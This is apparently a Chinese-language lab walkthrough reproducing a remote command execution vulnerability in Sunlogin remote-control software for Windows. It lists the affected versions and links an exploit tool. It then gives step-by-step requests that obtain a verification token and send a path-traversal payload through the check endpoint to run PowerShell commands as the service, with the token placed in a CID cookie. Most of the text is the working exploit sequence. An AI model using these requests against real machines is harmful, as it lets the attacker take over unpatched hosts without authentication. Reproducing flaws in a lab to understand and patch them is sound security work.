漏洞版本:

向日葵个人版for Windows 11.0.0.33 <=

向日葵简约版 V1.0.1.43315(2021.12)

11.1.1

10.3.0.27372

11.0.0.33162

版本下载:

官方网址下载然后抓包遍历ID即可

工具下载:

https://github.com/Mr-xn/sunlogin_rce

procexp64下载

http://www.xitongzhijia.net/soft/210933.html

第一步:获取向日葵监听的端口

打开 procexp ,右键点击向日葵,选中属性

image-20220220202942932

监听端口

image-20220220203126791

端口号:53921

第二步:获取 verify_string 值

http://10.211.55.6:53921/cgi-bin/rpc?action=verify-haras

image-20220220204616030

verify_string:  0243aFf9X19BCrB9vrfSLludf4jc9lai

第三步:拼接 payload 执行命令

http://10.211.55.6:53921/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ WHOAMI

cookie

CID=0243aFf9X19BCrB9vrfSLludf4jc9lai

命令执行成功

image-20220220204747793

image-20220220204817225